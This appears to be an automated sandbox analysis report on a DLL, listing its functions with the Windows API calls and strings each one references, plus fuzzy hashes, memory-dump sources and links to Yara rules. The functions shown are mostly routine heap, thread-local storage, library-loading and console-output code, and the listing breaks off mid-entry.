                          Uniqueness Score: -1.00%

                          Function 6F2310A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6F2310D6
                          • HeapAlloc.KERNEL32(01310000,00000000,0000000F), ref: 6F2310ED
                          • GetProcessHeap.KERNEL32(01310000,00000000,0000000F), ref: 6F23111F
                          • HeapAlloc.KERNEL32(01310000,00000000,00000010,01310000,00000000,0000000F), ref: 6F231136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,01310000,00000000,0000000F), ref: 6F23120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,01310000,00000000,0000000F), ref: 6F23121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 0f41d496daa59bd57b1c0e3be2eb7ed46e48365bf8231ec6cc82206b1e7321b7
                          • Instruction ID: e17e0e790380e16ce62931fd98be57a782f66edf682e91bbe1e439362d9d8f23
                          • Opcode Fuzzy Hash: 0f41d496daa59bd57b1c0e3be2eb7ed46e48365bf8231ec6cc82206b1e7321b7
                          • Instruction Fuzzy Hash: 6D516CB5E0072D9BDB00CFA4C880BEEB7B5FF49345F108225E815AB681DB759850CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24C860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6F24C89F
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6F24C953
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: ee522a984645c8b24afbd6d92645f8e800a8ba0f0a3fa01009689ef690c625d4
                          • Instruction ID: a092db173f37da78c312b5edf7ec7975d003d76ab57eba2562cd707f72b22e61
                          • Opcode Fuzzy Hash: ee522a984645c8b24afbd6d92645f8e800a8ba0f0a3fa01009689ef690c625d4
                          • Instruction Fuzzy Hash: 2841C834A4120DAFCF08CF6CC884AAE7BB5AF45728F108155E8249B791D7B5E919CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F242B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6F28ADB4), ref: 6F242B44
                          • TlsAlloc.KERNEL32 ref: 6F242B5A
                          • GetProcessHeap.KERNEL32 ref: 6F242B74
                          • HeapAlloc.KERNEL32(01310000,00000000,0000000C), ref: 6F242B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADB4), ref: 6F242BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6F242BE8
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 267174f725e02b7bdc8655f988d18df5d9b6061443292a6319ee464ab4bfc33f
                          • Instruction ID: 6b2d05215982d9fb9893b7c79f56c14133d4a54265fbaeb8625a8e6ccacc4a08
                          • Opcode Fuzzy Hash: 267174f725e02b7bdc8655f988d18df5d9b6061443292a6319ee464ab4bfc33f
                          • Instruction Fuzzy Hash: 194124B590031E9FEB04CF95C898B9EBBB1FF85319F104129D519AB780DBB59849CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F251BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6F251D09,FFFDD001,00000400,?,00000000,?,?,6F251E82,00000021,FlsSetValue,6F2839F8,6F283A00,?), ref: 6F251CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: e23872efe40e06d3156e8d5c83f472f21d6971b95bb11d03d6e13269eb8a0780
                          • Instruction ID: 8fa77b716f7202f175d9d8d668aaf3b8122d4e23c60ff9e38ef861af14b50cfb
                          • Opcode Fuzzy Hash: e23872efe40e06d3156e8d5c83f472f21d6971b95bb11d03d6e13269eb8a0780
                          • Instruction Fuzzy Hash: 7A21F6B290661EA7DB118F24CC44F8A3768EF42376F200111E921AB7C0D771F965CE91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24CCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,6F24CA41,6F24A8E2,6F24A0EC,?,6F24A324,?,00000001,?,?,00000001,?,6F287DA8,0000000C,6F24A41D), ref: 6F24CD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F24CD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F24CD34
                          • SetLastError.KERNEL32(00000000,6F24A324,?,00000001,?,?,00000001,?,6F287DA8,0000000C,6F24A41D,?,00000001,?), ref: 6F24CD86
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 5c54cdd068315b836c8008a26704f5756437dfc3f5ef4af04fbd59572530bbf5
                          • Instruction ID: 3c93ac09a83c104578186f8383c61afcb9094255e6437f5e9775cdb6d6d6aee5
                          • Opcode Fuzzy Hash: 5c54cdd068315b836c8008a26704f5756437dfc3f5ef4af04fbd59572530bbf5
                          • Instruction Fuzzy Hash: B501B93235DB1AEFAB1C16BCDC4C5572A54EB43B79720032DE538459D0EFE154188D60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2497A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6F249E50: GetTickCount64.KERNEL32 ref: 6F249E57
                          • GetTickCount64.KERNEL32 ref: 6F2497D6
                          • GetTickCount64.KERNEL32 ref: 6F2497F4
                          • GetTickCount64.KERNEL32 ref: 6F24980D
                          • GetTickCount64.KERNEL32 ref: 6F24980F
                          • GetTickCount64.KERNEL32 ref: 6F249816
                          • GetTickCount64.KERNEL32 ref: 6F249834
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: 847a969123472ca35c0cb048ecf3e8b4bd7c6bc6908f8318d0f54e60cf71e400
                          • Instruction ID: 2cef9a5b0d0a2ab1a895ba2807b63d422039b816f0db04f8cb352424716b5538
                          • Opcode Fuzzy Hash: 847a969123472ca35c0cb048ecf3e8b4bd7c6bc6908f8318d0f54e60cf71e400
                          • Instruction Fuzzy Hash: 76018062C24A1C8ED207AA39D846205B6AD6F973E4B11C313D04A77546FB9014F7CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F236D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {invalid syntax}, xrefs: 6F236D54
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F236D24
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6F236D7A, 6F236DB5
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 0ef14a3c1b065570730a4c84737a49f36c8999099e67ede961a407795423b7d0
                          • Instruction ID: 04d7387423e091d54124f16eae0685875a181581ff51a3507b60556500af3da4
                          • Opcode Fuzzy Hash: 0ef14a3c1b065570730a4c84737a49f36c8999099e67ede961a407795423b7d0
                          • Instruction Fuzzy Hash: 1D415BF2F0832C5BD3149A68D881F2ABBD99F85B44F00453EE9898F3D5D665C8418BA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23D1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23D1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23D213
                          • GetProcessHeap.KERNEL32 ref: 6F23D226
                          • HeapAlloc.KERNEL32(01310000,00000000,0000000C), ref: 6F23D239
                          • TlsSetValue.KERNEL32(00000000,00000000,01310000,00000000,0000000C), ref: 6F23D266
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: 6c56319f3905df21190acc501cbb3c69ceba6604702f905e2189bbaa038d9369
                          • Instruction ID: 02058fda0ef783051bd4d6f74177ffbda9f443adf36b1f466d47ddbd2198bf9e
                          • Opcode Fuzzy Hash: 6c56319f3905df21190acc501cbb3c69ceba6604702f905e2189bbaa038d9369
                          • Instruction Fuzzy Hash: 7711E4F2B0172FDBEB144FB18858B66379AAB027A6F404415E910CBBC1DB74E824CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6F250ECD
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                          • API String ID: 0-1872383224
                          • Opcode ID: b0dc1307df7bf0635cbf7c7c0343b1b5e6edb946d0eb0a62053e74b8a5b5059c
                          • Instruction ID: 248014dbf8ff37153be0af854e9d4159b2242310c5bf22a16a21f0830868c85c
                          • Opcode Fuzzy Hash: b0dc1307df7bf0635cbf7c7c0343b1b5e6edb946d0eb0a62053e74b8a5b5059c
                          • Instruction Fuzzy Hash: 0D21493161C20FBF9710DFB5CC4095B77A9EF413AD7109625E8149BA80DB70F8608FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24DD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6F24DE23,00000000,?,00000001,00000000,?,6F24DE9A,00000001,FlsFree,6F282F84,FlsFree,00000000), ref: 6F24DDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: 052e532f2e4e2776d5c70c8b8e29c90721a9aec9252255fd386daa6f2d46b7a6
                          • Instruction ID: e78c683caaba6c4dc54361d52da155288aa6ea6cda44484c9f4701bb61e2ee14
                          • Opcode Fuzzy Hash: 052e532f2e4e2776d5c70c8b8e29c90721a9aec9252255fd386daa6f2d46b7a6
                          • Instruction Fuzzy Hash: 8F119433A55A2ADBDF164BA8CC44B8A33A5AF03771F500251E921AB2C4D6E0F915CED5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24EC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D62528FD,00000000,?,00000000,6F257473,000000FF,?,6F24EBBD,?,?,6F24EB91,?), ref: 6F24EC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F24EC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6F257473,000000FF,?,6F24EBBD,?,?,6F24EB91,?), ref: 6F24EC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: aae84615cfcd08d62ceafa32aac379da060eabb2d8d4fb63e8d47a524ceddaa0
                          • Instruction ID: 7c43fe34d09920840e3d75bc57a6ad997827c632fab0b8dc7fd370ddc31fd519
                          • Opcode Fuzzy Hash: aae84615cfcd08d62ceafa32aac379da060eabb2d8d4fb63e8d47a524ceddaa0
                          • Instruction Fuzzy Hash: 26016271914959AFDF01DF50CD09FEEBBB9FB05721F004626E821A26D0DBB4A914CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6F23C425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6F23C435
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 19d99a790b8babe3ec3f0a432ebfd41b9186ae92e6f71d63aea6622c6f1c21bd
                          • Instruction ID: 60f7e1641081907d5c4a596a78c5507aa3e70df9f5b5b7a1eb00595d49ad936e
                          • Opcode Fuzzy Hash: 19d99a790b8babe3ec3f0a432ebfd41b9186ae92e6f71d63aea6622c6f1c21bd
                          • Instruction Fuzzy Hash: 6AB092B0A1891A67AEA1AB724E0CBA73A5BA9A2A623818440A111E1881CEB0D034DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6F23C445
                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6F23C455
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: a98d238dff4fd482f6ef8e0cce7e975aac2d6d8af0efc28998ecfd3e1d07668f
                          • Instruction ID: c0a4543d4cab153006b6b26ff98fc1db5f9aa5b800c2669af273dfd2b4d868e7
                          • Opcode Fuzzy Hash: a98d238dff4fd482f6ef8e0cce7e975aac2d6d8af0efc28998ecfd3e1d07668f
                          • Instruction Fuzzy Hash: 9BB012F0A1891967BEB1EB724D0CBB73B9BA9516723418440B211E1480CFF0C038DD71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6F23C4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: 7654e89b47ae87a783b98c0b6f7e90754b22282051a453b0264f639698fe59f3
                          • Instruction ID: f8d98b064041920b46fe67e5d2916741847fb74598d9dda7c52f232d62056881
                          • Opcode Fuzzy Hash: 7654e89b47ae87a783b98c0b6f7e90754b22282051a453b0264f639698fe59f3
                          • Instruction Fuzzy Hash: B1B092F0A1896A679EB06B714D0CBA63A6AE9417323818445E556D1480EEB49024ED32
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6F23C495
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: a4ed19d15bf0100a41f6a4225cb67f31f7e51b05cd248ebe7f47f16c8985fc8b
                          • Instruction ID: 0ec20e415a4ab9daebe6626234c3c17df12caae179a5e3c2f5200b7a64d63ec2
                          • Opcode Fuzzy Hash: a4ed19d15bf0100a41f6a4225cb67f31f7e51b05cd248ebe7f47f16c8985fc8b
                          • Instruction Fuzzy Hash: A3B092B0A58A69679EB06B714D0CBA63B7AE9426223418440E11AD1480CEB0E024ED33
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6F23C4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: 50b8eb86bebd6ae00d3d3103f00a0f1c2270f8536ed1bae677b923a7fb825672
                          • Instruction ID: aa611dd1f1634581a167c5fdbee96b67aeb65fa383d4a889a78f454535f33e11
                          • Opcode Fuzzy Hash: 50b8eb86bebd6ae00d3d3103f00a0f1c2270f8536ed1bae677b923a7fb825672
                          • Instruction Fuzzy Hash: 4CB092B0A589A96B9EB06B714D0CBA63B6AE9417223818441E116D2881CEB08024ED33
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F254089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(D62528FD,?,00000000,?), ref: 6F2540EC
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F254347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F25438F
                          • GetLastError.KERNEL32 ref: 6F254432
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 88decbd1379b921d07a4b2aa8708e4a733e9f167bc960ea91f7d3518ac044982
                          • Instruction ID: a8ad5f7de2f81d2020e7237cc43316fb6dcd6a538991aae0bf5410161c97a9be
                          • Opcode Fuzzy Hash: 88decbd1379b921d07a4b2aa8708e4a733e9f167bc960ea91f7d3518ac044982
                          • Instruction Fuzzy Hash: 3ED157B5D04258AFCF05CFA8C890AADFBB5FF09314F14812AE865EB651D730A966CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F242620, Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6F2427B1
                          • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6F242803
                          • GetLastError.KERNEL32(?,?,?), ref: 6F24280D
                          • GetLastError.KERNEL32(?,?,?), ref: 6F242875
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
